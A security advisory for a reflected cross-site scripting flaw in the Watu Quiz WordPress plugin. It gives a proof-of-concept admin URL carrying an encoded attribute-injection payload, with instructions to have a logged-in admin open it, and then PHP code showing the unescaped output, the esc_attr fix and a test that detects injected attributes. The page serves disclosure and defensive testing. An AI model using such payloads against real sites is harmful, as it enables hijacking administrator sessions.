wpexploit | Felipe Restrepo Rodriguez | WPEX-ID: C933460B-F77D-4986-9F5A-32D9F3F8B412
History: Jan 24, 2023 - 12:00 a.m.

Watu Quiz < 3.3.8.2 - Reflected XSS

Tags: watu quiz, reflected xss, logged in admin, malicious url, security vulnerability, admin panel, exploit

EPSS: 0.001 (Low), percentile 35.3%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting vulnerability that could be used against high-privilege users such as admins.

Make a logged-in admin open the following URL:

https://example.com/wp-admin/admin.php?page=watu_exams&title=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F
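An added illustration, not the plugin's own code, of the output pattern this advisory describes and of its fix: the parameter name and surrounding markup are assumptions based on the PoC URL, and WordPress's esc_attr() is stubbed so the file runs outside WordPress.

```php
<?php
// Hypothetical illustration of the advisory's bug class (not Watu Quiz's code):
// a request parameter echoed into an HTML attribute, unescaped vs. escaped.

// Stand-in for WordPress's esc_attr() so this runs outside WordPress; the real
// function is what a plugin should call.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES, 'UTF-8' );
    }
}

// Vulnerable: the parameter is placed inside value="..." unchanged, so a `"`
// closes the attribute and the remainder becomes new attributes on the element.
function render_title_field_vulnerable( array $get ) {
    $title = isset( $get['title'] ) ? $get['title'] : '';
    return '<input type="text" name="title" value="' . $title . '">';
}

// Fixed: esc_attr() encodes " ' < > &, so the parameter cannot leave the
// attribute value regardless of its content.
function render_title_field_fixed( array $get ) {
    $title = isset( $get['title'] ) ? $get['title'] : '';
    return '<input type="text" name="title" value="' . esc_attr( $title ) . '">';
}

// Defender's check: parse the markup the way a browser would and list every
// attribute on the <input> beyond the three the template intends to emit.
function unexpected_input_attributes( $html ) {
    libxml_use_internal_errors( true );
    $dom = new DOMDocument();
    $dom->loadHTML( '<html><body>' . $html . '</body></html>' );
    $input    = $dom->getElementsByTagName( 'input' )->item( 0 );
    $expected = array( 'type', 'name', 'value' );
    $extra    = array();
    foreach ( $input->attributes as $attr ) {
        if ( ! in_array( strtolower( $attr->name ), $expected, true ) ) {
            $extra[] = strtolower( $attr->name );
        }
    }
    return $extra;
}

// Constructed sample: the decoded `title` value from the PoC URL above, as PHP
// would present it in $_GET.
$sample = array( 'title' => '" style=animation-name:rotation onanimationstart=alert(/XSS/)//' );

// The vulnerable render grows style/onanimationstart attributes; the fixed one does not.
print_r( unexpected_input_attributes( render_title_field_vulnerable( $sample ) ) );
print_r( unexpected_input_attributes( render_title_field_fixed( $sample ) ) );
```

The same check is useful in plugin test suites: render each admin template with attribute-breaking input and assert that no attribute outside the template's own set appears.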
